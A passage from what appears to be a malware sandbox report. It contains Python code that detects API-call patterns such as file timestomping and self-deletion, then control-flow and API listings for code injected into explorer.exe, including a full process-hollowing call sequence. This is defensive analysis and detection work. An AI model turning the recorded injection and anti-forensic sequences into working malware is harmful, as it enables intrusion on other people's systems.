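                          "CreateToolhelp32Snapshot"],
}

# Patterns whose path-bearing calls must all refer to the same file.
PATH_BOUND = {"drop_and_timestomp", "self_delete"}


def match_subsequence(trace: Sequence[ApiCall], pattern: Sequence[str],
                      same_path: bool) -> Optional[List[ApiCall]]:
    """Return the calls of the first in-order match of pattern, or None.

    Every occurrence of pattern[0] is tried as an anchor. With same_path the
    anchor's path is fixed and later path-bearing calls must use it, so an
    unrelated file operation cannot complete the pattern. Once the anchor is
    fixed, greedy earliest matching is sufficient for a subsequence search.
    """
    for start, first in enumerate(trace):
        if first.api != pattern[0]:
            continue
        anchor = first.path if same_path else None
        matched = [first]
        pos = start + 1
        for want in pattern[1:]:
            while pos < len(trace):
                call = trace[pos]
                pos += 1
                if call.api == want and (anchor is None or call.path in ("", anchor)):
                    matched.append(call)
                    break
            else:
                break  # trace exhausted for this anchor; try the next one
        if len(matched) == len(pattern):
            return matched
    return None


def scan(trace: Sequence[ApiCall]) -> Dict[str, List[int]]:
    """Map each matched pattern name to the trace positions that matched it."""
    hits: Dict[str, List[int]] = {}
    for name, pattern in PATTERNS.items():
        found = match_subsequence(trace, pattern, name in PATH_BOUND)
        if found is not None:
            hits[name] = [c.seq for c in found]
    return hits


# Constructed trace in the order the execution graphs show; the paths are
# invented for the example.
DROP = r"C:\Users\user\AppData\Roaming\payload.exe"
ORIG = r"C:\Users\user\Desktop\e6reA52T4I.exe"
SAMPLE_TRACE = [
    ApiCall(1, "RtlCreateHeap"), ApiCall(2, "CreateThread"),
    ApiCall(3, "CreateToolhelp32Snapshot"), ApiCall(4, "Process32First"),
    ApiCall(5, "Process32Next"), ApiCall(6, "Process32Next"),
    ApiCall(7, "CloseHandle"), ApiCall(8, "SleepEx"),
    ApiCall(9, "CreateToolhelp32Snapshot"),
    ApiCall(10, "DeleteFileW", DROP), ApiCall(11, "CopyFileW", DROP),
    ApiCall(12, "DeleteFileW", r"C:\Users\user\AppData\Local\Temp\stage.tmp"),
    ApiCall(13, "SetFileAttributesW", DROP), ApiCall(14, "CreateFileW", DROP),
    ApiCall(15, "SetFileTime", DROP),
    ApiCall(16, "DeleteFileW", ORIG), ApiCall(17, "DeleteFileW", ORIG),
    ApiCall(18, "SleepEx"), ApiCall(19, "RtlExitUserThread"),
]

# Constructed benign trace: an installer copies one file and re-stamps
# another. Same API names in the same order, but on different paths.
BENIGN_TRACE = [
    ApiCall(1, "CopyFileW", r"C:\Program Files\App\app.exe"),
    ApiCall(2, "SetFileAttributesW", r"C:\Program Files\App\readme.txt"),
    ApiCall(3, "CreateFileW", r"C:\Program Files\App\readme.txt"),
    ApiCall(4, "SetFileTime", r"C:\Program Files\App\readme.txt"),
    ApiCall(5, "DeleteFileW", r"C:\Program Files\App\old.log"),
    ApiCall(6, "SleepEx"),
]

if __name__ == "__main__":
    for name, seqs in scan(SAMPLE_TRACE).items():
        print(f"{name}: calls {seqs}")
    print("benign:", scan(BENIGN_TRACE))
```

Binding the file patterns to one path is the part worth keeping when this is turned into a rule: the benign trace carries the same four API names in the same order as the drop-and-timestomp sequence, and without the path constraint it matches too. The process-enumeration pattern has no path to bind, so its loop shape (snapshot, walk, close, sleep, snapshot again) is the whole signal.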

                                                                                          Control-flow Graph

control_flow_graph (rendered from the flattened node/edge dump): function at 83f19a0, blocks 83f19a0–83f1ca8, the same routine as b319a0 in the other region. A setup loop over 83f19d7–83f1a4f is followed by two calls to 83f1cb0 (83f1a5e, 83f1a7c); 83f1aa4–83f1ad3 calls RtlCreateHeap; 83f1ad5–83f1aef (call 83f4e6c) and 83f1af5–83f1b0d (call 83f5224) form a loop; 83f1b0f–83f1bbe makes five more 83f1cb0 calls; 83f1bc4–83f1c1f calls 83f4a6c three times; after the checks at 83f1c21 and 83f1c2a, 83f1c2f–83f1c7c calls CreateThread twice and returns through 83f1c84–83f1c86. Every failed check exits through 83f1c88 → 83f1c8a–83f1ca8.
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2727880328.00000000083F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 083F1000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_83f1000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Create$Thread$Heap
                                                                                          • String ID: iP+
                                                                                          • API String ID: 1054751041-51890417
                                                                                          • Opcode ID: 26f900cbed04e092ee0982a3be71c41bf08b15ef31f8e9e270c5fbcd78812b0b
                                                                                          • Instruction ID: 5cf4df986b8743a54551d9ebb3ef136d8310acdc4f986614993e2160d585db92
                                                                                          • Opcode Fuzzy Hash: 26f900cbed04e092ee0982a3be71c41bf08b15ef31f8e9e270c5fbcd78812b0b
                                                                                          • Instruction Fuzzy Hash: 7091AD34218A088FCF48EF18E8C16A973E1FBE8311B09467D9D4ECB257DA34D9118BD6

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B31000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_b31000_explorer.jbxd
Yara matches
Similarity
• API ID: File$AttributesCreateTime
• String ID:
• API String ID: 1986686026-0
• Opcode ID: f5498ff0e911ccfe91ba0c0551e8fa87a213adc709a22552d401718206ad2213
• Instruction ID: 13c3a17e03ac4eaaf91cf641ed573f9d098a6d4e23ad7f4f386eddbfab2ded32
• Opcode Fuzzy Hash: f5498ff0e911ccfe91ba0c0551e8fa87a213adc709a22552d401718206ad2213
• Instruction Fuzzy Hash: 8621103170CA4C8FDFA4EF69D88879E76E2FBD8301F10456DA84EC7255DA34CA458781

Control-flow Graph
[Control-flow graph rooted at basic block b34d50; graph image and executed/not-executed legend not reproduced. Graph nodes reference RegQueryValueExA and ObtainUserAgentString.]
APIs
• RegQueryValueExA.KERNEL32 ref: 00B34DD5
• ObtainUserAgentString.URLMON ref: 00B34E3E
Memory Dump Source
• Source File: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B31000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_b31000_explorer.jbxd
Yara matches
Similarity
• API ID: AgentObtainQueryStringUserValue
• String ID:
• API String ID: 4107646653-0
• Opcode ID: 997ac8fe02efc5f307ac4cae89ba3b52f0d6671010cb042dd0c96d2438d46594
• Instruction ID: 16419d0e65ed4e58b94f83c9a7bbb131a861df65cd3dcef61159f659616b3758
• Opcode Fuzzy Hash: 997ac8fe02efc5f307ac4cae89ba3b52f0d6671010cb042dd0c96d2438d46594
• Instruction Fuzzy Hash: 93318431608A5C8FDB18EF68E8895EA77E5FB98314F1002BAE84EC7145EF60DC4687D1

Control-flow Graph
APIs
  • Part of subcall function 083F4BE0: GetVolumeInformationA.KERNEL32 ref: 083F4C4D
• CreateMutexExA.KERNEL32 ref: 083F1DA7
• CreateFileMappingA.KERNEL32 ref: 083F1E54
Memory Dump Source
• Source File: 00000003.00000002.2727880328.00000000083F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 083F1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_83f1000_explorer.jbxd
Yara matches
Similarity
• API ID: Create$FileInformationMappingMutexVolume
• String ID:
• API String ID: 3260430491-0
• Opcode ID: 97bb87496fde6e4db97111b52ca229a5d1b0978d98986e1021884b3d981a9ef1
• Instruction ID: 8938f9b4e769022745fff9d98a75e72b37e5b013540a8c9ed306dc1141fae610
• Opcode Fuzzy Hash: 97bb87496fde6e4db97111b52ca229a5d1b0978d98986e1021884b3d981a9ef1
• Instruction Fuzzy Hash: 1C315D30714F488FDB65EB39D0083AF76D2EBD9306F54493E819ED6242CBB499468B86

Control-flow Graph
[Control-flow graph rooted at basic block b31d34; graph image and executed/not-executed legend not reproduced. Graph nodes reference CreateMutexExA and CreateFileMappingA.]
APIs
  • Part of subcall function 00B34BE0: GetVolumeInformationA.KERNEL32 ref: 00B34C4D
• CreateMutexExA.KERNEL32 ref: 00B31DA7
• CreateFileMappingA.KERNEL32 ref: 00B31E54
Memory Dump Source
• Source File: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B31000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_b31000_explorer.jbxd
Yara matches
Similarity
• API ID: Create$FileInformationMappingMutexVolume
• String ID:
• API String ID: 3260430491-0
• Opcode ID: 97bb87496fde6e4db97111b52ca229a5d1b0978d98986e1021884b3d981a9ef1
• Instruction ID: ae8df5747253b61c14132dcb20372a6ba725714757d7983c6e3a857b6b817548
• Opcode Fuzzy Hash: 97bb87496fde6e4db97111b52ca229a5d1b0978d98986e1021884b3d981a9ef1
• Instruction Fuzzy Hash: FE319F30704F584FCB65EB39C0083AFB6D2EB99305F644CAE949FD6242CF75A9068786

Control-flow Graph
APIs
• GetTokenInformation.KERNELBASE ref: 083F49EC
• GetTokenInformation.KERNELBASE ref: 083F4A1C
Memory Dump Source
• Source File: 00000003.00000002.2727880328.00000000083F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 083F1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_83f1000_explorer.jbxd
Yara matches
Similarity
• API ID: InformationToken
• String ID:
• API String ID: 4114910276-0
• Opcode ID: 652aecce9067a30358b91952564671c85239d7f531018ec1d7311adbfa28af3f
• Instruction ID: fdfba84e097cde11cd09faa5a54a0d180cf42c4e6d99b361b45eb7fe384691fd
• Opcode Fuzzy Hash: 652aecce9067a30358b91952564671c85239d7f531018ec1d7311adbfa28af3f
• Instruction Fuzzy Hash: 8B215434208A488FC754EF2CD4885AAB7F1FFD9311B004A5EE59BC7264CB70E945CB81

Control-flow Graph
[Control-flow graph rooted at basic block b349a0; graph image and executed/not-executed legend not reproduced. Graph nodes reference two GetTokenInformation call sites.]
APIs
• GetTokenInformation.KERNELBASE ref: 00B349EC
• GetTokenInformation.KERNELBASE ref: 00B34A1C
Memory Dump Source
• Source File: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B31000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_b31000_explorer.jbxd
Yara matches
Similarity
• API ID: InformationToken
• String ID:
• API String ID: 4114910276-0
• Opcode ID: 652aecce9067a30358b91952564671c85239d7f531018ec1d7311adbfa28af3f
• Instruction ID: 4eeeb92ee6c7df9486f3f78999d0118a594d906e5ed02d834fcc37043e901592
• Opcode Fuzzy Hash: 652aecce9067a30358b91952564671c85239d7f531018ec1d7311adbfa28af3f
• Instruction Fuzzy Hash: 60214234208A488FC754EF2CD4885AAB7F1FFD9311B104A5EE49AC7264CB70E945CB81

Control-flow Graph
[Control-flow graph rooted at basic block 83f3ca4; graph image and executed/not-executed legend not reproduced. Graph nodes reference CreateToolhelp32Snapshot and SleepEx.]
APIs
Memory Dump Source
• Source File: 00000003.00000002.2727880328.00000000083F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 083F1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_83f1000_explorer.jbxd
Yara matches
Similarity
• API ID: CreateSleepSnapshotToolhelp32
• String ID:
• API String ID: 684154974-0
• Opcode ID: 1adf98eb8c503d42aecd34c6b39fce325a4a04e32c54699d588d18b6d36bf1ef
• Instruction ID: d8076cdb06b273cc18617e377d133c7e9d2afa23d746025f0ee6c3f32b21c09e
• Opcode Fuzzy Hash: 1adf98eb8c503d42aecd34c6b39fce325a4a04e32c54699d588d18b6d36bf1ef
• Instruction Fuzzy Hash: 8C11E430218A498FEB14EB24C4887BB76D2FBC8316F184A7DE54BDA796DAB484418791

Control-flow Graph
[Control-flow graph rooted at basic block 83f3d80; graph image and executed/not-executed legend not reproduced. Graph nodes reference EnumWindows and SleepEx in a self-looping block.]
APIs
Memory Dump Source
• Source File: 00000003.00000002.2727880328.00000000083F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 083F1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_83f1000_explorer.jbxd
Yara matches
Similarity
• API ID: EnumSleepWindows
• String ID:
• API String ID: 498413330-0
• Opcode ID: f3c7586747357b588c35315657a812ba148d3fa2d02c4e479e86db6dcc9cbd3e
• Instruction ID: 9537924dfc1aa30db200a7812de4b53930b9bc745e58414783d7353919c595c5
• Opcode Fuzzy Hash: f3c7586747357b588c35315657a812ba148d3fa2d02c4e479e86db6dcc9cbd3e
• Instruction Fuzzy Hash: F2E04F30A086898FEB18DBB4C4CC7F23691DB59206F5808B9DD4ADD797C6A65485C351

Control-flow Graph
[Control-flow graph rooted at basic block b33d80; graph image and executed/not-executed legend not reproduced. Graph nodes reference EnumWindows and SleepEx in a self-looping block.]
APIs
Memory Dump Source
• Source File: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B31000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_b31000_explorer.jbxd
Yara matches
Similarity
• API ID: EnumSleepWindows
• String ID:
• API String ID: 498413330-0
• Opcode ID: f3c7586747357b588c35315657a812ba148d3fa2d02c4e479e86db6dcc9cbd3e
• Instruction ID: 46617dcbb670727d831bb0b44e6a05e050d1872092174fc5f5ec85fd5dc5ec6e
• Opcode Fuzzy Hash: f3c7586747357b588c35315657a812ba148d3fa2d02c4e479e86db6dcc9cbd3e
• Instruction Fuzzy Hash: 8AE08630A086894FEF58DBB4C4CC7F236D1DB19305F6808B9DC4BDD696CAAA5984C311

Memory Dump Source
• Source File: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B31000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_b31000_explorer.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5f808b6709be1d712b9c517ecd9c93eda4043063f06578d6a062a0bf28ad2d93
• Instruction ID: 78e01c19c92f0324933895acf85591668ec8a34fb55f56ff135d37a747880e25
• Opcode Fuzzy Hash: 5f808b6709be1d712b9c517ecd9c93eda4043063f06578d6a062a0bf28ad2d93
• Instruction Fuzzy Hash: 81D17130718F088FDB58EF68D8456AEB7E2FB98701F20456DE44AC3251DF74E9468B86

APIs
Memory Dump Source
• Source File: 00000003.00000002.2727880328.00000000083F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 083F1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_83f1000_explorer.jbxd
Yara matches
Similarity
• API ID: CreateInstance
• String ID:
• API String ID: 542301482-0
• Opcode ID: 2208a6a82576e187932f5e6c94c4aea895329bbb5408a92f633c0b1253718546
• Instruction ID: 9f813762a3f43d80c03713fdc56a230f1d8da384380636874bddc15ee0f71b79
• Opcode Fuzzy Hash: 2208a6a82576e187932f5e6c94c4aea895329bbb5408a92f633c0b1253718546
• Instruction Fuzzy Hash: 1FE1EA34608A48CFCF94EF28C885E99B7F1FFA9305F114699E44ACB265DB30E945CB81

APIs
Memory Dump Source
• Source File: 00000003.00000002.2727880328.00000000083F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 083F1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_83f1000_explorer.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 8d1e4db704517eea09dd1d3d297329f0e9ff07853cce15996669b6bd33a65373
• Instruction ID: ebd038aea36ea9aee5b860032c3daa209c8c24b27949382c6bef43b53943d19c
• Opcode Fuzzy Hash: 8d1e4db704517eea09dd1d3d297329f0e9ff07853cce15996669b6bd33a65373
• Instruction Fuzzy Hash: CF410434718A5C4FDBA8FF6894187AA72D2EBD8202F50417E990EC7396DE388D468785

APIs
Memory Dump Source
• Source File: 00000003.00000002.2727880328.00000000083F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 083F1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_83f1000_explorer.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: bce1ea647a0ad53f7809f43b4b76498aa7ec4cacb6875e2a025e8a9db3f2ac28
• Instruction ID: a5ff2a3f08e262908b2e45662a049a8f76ed8818252325c411f1797981d20f3a
• Opcode Fuzzy Hash: bce1ea647a0ad53f7809f43b4b76498aa7ec4cacb6875e2a025e8a9db3f2ac28
• Instruction Fuzzy Hash: 94419530718E1D1FD79CEA6C98583BAB6D1EBC9252F14063EA59FC3352DE24985347C1

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B31000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b31000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateFile
                                                                                          • String ID:
                                                                                          • API String ID: 823142352-0
                                                                                          • Opcode ID: bce1ea647a0ad53f7809f43b4b76498aa7ec4cacb6875e2a025e8a9db3f2ac28
                                                                                          • Instruction ID: 7b122f18f2e9a429202e3b7c4a44f65c7d5de73880db74997b4102657db2b4e7
                                                                                          • Opcode Fuzzy Hash: bce1ea647a0ad53f7809f43b4b76498aa7ec4cacb6875e2a025e8a9db3f2ac28
                                                                                          • Instruction Fuzzy Hash: 9E41B530718E1D1FD75CEB6C98593BAB6C1EBC9711F24066EA4AFC3352DE24A9424781
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2727880328.00000000083F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 083F1000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_83f1000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: QueryValue
                                                                                          • String ID:
                                                                                          • API String ID: 3660427363-0
                                                                                          • Opcode ID: 997ac8fe02efc5f307ac4cae89ba3b52f0d6671010cb042dd0c96d2438d46594
                                                                                          • Instruction ID: de7883e31ded536891b67c1f0413d05ed851cf8bc92fa472119b6f761af92119
                                                                                          • Opcode Fuzzy Hash: 997ac8fe02efc5f307ac4cae89ba3b52f0d6671010cb042dd0c96d2438d46594
                                                                                          • Instruction Fuzzy Hash: F031B935608A4C8FDB18FF68D8895EA77D5FBD8315B00027EE94EC7246EE7098468BD1
                                                                                          APIs
                                                                                          • GetVolumeInformationA.KERNEL32 ref: 083F4C4D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2727880328.00000000083F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 083F1000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_83f1000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InformationVolume
                                                                                          • String ID:
                                                                                          • API String ID: 2039140958-0
                                                                                          • Opcode ID: 849063828afd568fceaff528b4835c67d3789973111070d710bf79c2b37fb4e8
                                                                                          • Instruction ID: 248e5515f2c4305cdbba15a658b20cdcfe8c5f693fe83b5a4d11b2d4e6bb18ef
                                                                                          • Opcode Fuzzy Hash: 849063828afd568fceaff528b4835c67d3789973111070d710bf79c2b37fb4e8
                                                                                          • Instruction Fuzzy Hash: B3314430614A4C4FD7A4EF68C4486AA77E1FBE8311F10466E994EC7265DE30DA45CBC1
                                                                                          APIs
                                                                                          • GetVolumeInformationA.KERNEL32 ref: 00B34C4D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B31000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b31000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InformationVolume
                                                                                          • String ID:
                                                                                          • API String ID: 2039140958-0
                                                                                          • Opcode ID: 849063828afd568fceaff528b4835c67d3789973111070d710bf79c2b37fb4e8
                                                                                          • Instruction ID: 8a05fc17fd67c3ec13b2cf68764c5d5bf4892e5f303f2d929f4411c9ac030fb5
                                                                                          • Opcode Fuzzy Hash: 849063828afd568fceaff528b4835c67d3789973111070d710bf79c2b37fb4e8
                                                                                          • Instruction Fuzzy Hash: E1315530614A4C4FD7A4EF68C8486EA77E1FBA8311F10466EA94EC7265DE34DA45CBC1
                                                                                          APIs
                                                                                            • Part of subcall function 083F19A0: RtlCreateHeap.NTDLL ref: 083F1ABB
                                                                                          • SleepEx.KERNEL32(?,?,?,?,?,?,?,083F1943), ref: 083F1970
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2727880328.00000000083F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 083F1000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_83f1000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateHeapSleep
                                                                                          • String ID:
                                                                                          • API String ID: 221814145-0
                                                                                          • Opcode ID: 27439b667a4ceb6ac9e8a4e5b9f5677b2aaa942c4ffff63dd0c687c138e059ef
                                                                                          • Instruction ID: c5265eccdb239897794cd5803c613effba008c2e398e9f38b80d05fecf7ab399
                                                                                          • Opcode Fuzzy Hash: 27439b667a4ceb6ac9e8a4e5b9f5677b2aaa942c4ffff63dd0c687c138e059ef
                                                                                          • Instruction Fuzzy Hash: E8E0D820714B088BDB95BB69E0C433D7190DBC8151F84097D670AC7383D8258C8183D1
                                                                                          APIs
                                                                                            • Part of subcall function 00B319A0: RtlCreateHeap.NTDLL ref: 00B31ABB
                                                                                          • SleepEx.KERNEL32(?,?,?,?,?,?,?,00B31943), ref: 00B31970
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B31000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b31000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateHeapSleep
                                                                                          • String ID:
                                                                                          • API String ID: 221814145-0
                                                                                          • Opcode ID: 27439b667a4ceb6ac9e8a4e5b9f5677b2aaa942c4ffff63dd0c687c138e059ef
                                                                                          • Instruction ID: a8734810817dcbac364daae1de841864cecce7715de35f83851b70264108f38c
                                                                                          • Opcode Fuzzy Hash: 27439b667a4ceb6ac9e8a4e5b9f5677b2aaa942c4ffff63dd0c687c138e059ef
                                                                                          • Instruction Fuzzy Hash: 34E04F20714F081BDB98BB6CD4D532C72D5DB89350FA40EF9B94AD7296D9298C868312

                                                                                          Execution Graph

                                                                                          Execution Coverage:37.2%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:39
                                                                                          Total number of Limit Nodes:7
                                                                                          execution_graph 575 860000 578 860630 575->578 577 860005 579 86064c 578->579 581 861577 579->581 584 8605b0 581->584 587 8605dc 584->587 585 8605e2 GetFileAttributesA 585->587 586 86061e 587->585 587->586 589 860420 587->589 590 8604f3 589->590 591 8604ff CreateWindowExA 590->591 592 8604fa 590->592 591->592 593 860540 PostMessageA 591->593 592->587 594 86055f 593->594 594->592 596 860110 VirtualAlloc GetModuleFileNameA 594->596 597 860414 596->597 598 86017d CreateProcessA 596->598 597->594 598->597 600 86025f VirtualFree VirtualAlloc Wow64GetThreadContext 598->600 600->597 601 8602a9 ReadProcessMemory 600->601 602 8602e5 VirtualAllocEx NtWriteVirtualMemory 601->602 603 8602d5 NtUnmapViewOfSection 601->603 606 86033b 602->606 603->602 604 860350 NtWriteVirtualMemory 604->606 605 86039d WriteProcessMemory Wow64SetThreadContext ResumeThread 607 8603fb ExitProcess 605->607 606->604 606->605 609 991c90 612 991ca0 609->612 613 991caf 612->613 616 992440 613->616 617 99245b 616->617 618 992464 CreateToolhelp32Snapshot 617->618 619 992480 Module32First 617->619 618->617 618->619 620 99248f 619->620 622 991c9f 619->622 623 9920ff 620->623 624 99212a 623->624 625 99213b VirtualAlloc 624->625 626 992173 624->626 625->626 626->626

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 00860156
                                                                                          • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0086016C
                                                                                          • CreateProcessA.KERNELBASE(?,00000000), ref: 00860255
                                                                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00860270
                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00860283
                                                                                          • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 0086029F
                                                                                          • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 008602C8
                                                                                          • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 008602E3
                                                                                          • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00860304
                                                                                          • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0086032A
                                                                                          • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 00860399
                                                                                          • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 008603BF
                                                                                          • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 008603E1
                                                                                          • ResumeThread.KERNELBASE(00000000), ref: 008603ED
                                                                                          • ExitProcess.KERNEL32(00000000), ref: 00860412
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1813374508.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_860000_hdeufvw.jbxd
                                                                                          Similarity
                                                                                          • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                                                                          • String ID:
                                                                                          • API String ID: 93872480-0
                                                                                          • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                          • Instruction ID: 48f36803586bf9cc5d893b2daec4c6c12b4842be52f978c8cfee5cd863e779dc
                                                                                          • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                          • Instruction Fuzzy Hash: 08B1C874A00208AFDB44CF98C895FAEBBB5FF88314F248158E509AB391D771AE41CF94

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 15 860420-8604f8 17 8604ff-86053c CreateWindowExA 15->17 18 8604fa 15->18 20 860540-860558 PostMessageA 17->20 21 86053e 17->21 19 8605aa-8605ad 18->19 22 86055f-860563 20->22 21->19 22->19 23 860565-860579 22->23 23->19 25 86057b-860582 23->25 26 860584-860588 25->26 27 8605a8 25->27 26->27 28 86058a-860591 26->28 27->22 28->27 29 860593-860597 call 860110 28->29 31 86059c-8605a5 29->31 31->27
                                                                                          APIs
                                                                                          • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 00860533
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1813374508.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_860000_hdeufvw.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateWindow
                                                                                          • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                                          • API String ID: 716092398-2341455598
                                                                                          • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                          • Instruction ID: 98a3d3d7ae511a9b9ea567fc181acbd6f8e85e4971bd31f107135bfb9894c274
                                                                                          • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                          • Instruction Fuzzy Hash: 95511870D08388DAEB11CBE8C849BDEBFB2AF11708F144058D5457F286C7BA5A58CB66

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 32 8605b0-8605d5 33 8605dc-8605e0 32->33 34 8605e2-8605f5 GetFileAttributesA 33->34 35 86061e-860621 33->35 36 8605f7-8605fe 34->36 37 860613-86061c 34->37 36->37 38 860600-86060b call 860420 36->38 37->33 40 860610 38->40 40->37
                                                                                          APIs
                                                                                          • GetFileAttributesA.KERNELBASE(apfHQ), ref: 008605EC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1813374508.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_860000_hdeufvw.jbxd
                                                                                          Similarity
                                                                                          • API ID: AttributesFile
                                                                                          • String ID: apfHQ$o
                                                                                          • API String ID: 3188754299-2999369273
                                                                                          • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                          • Instruction ID: 1b7e1c9c7098a92935539fc288257bcc305fc722126d1b7a73094522391a105b
                                                                                          • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
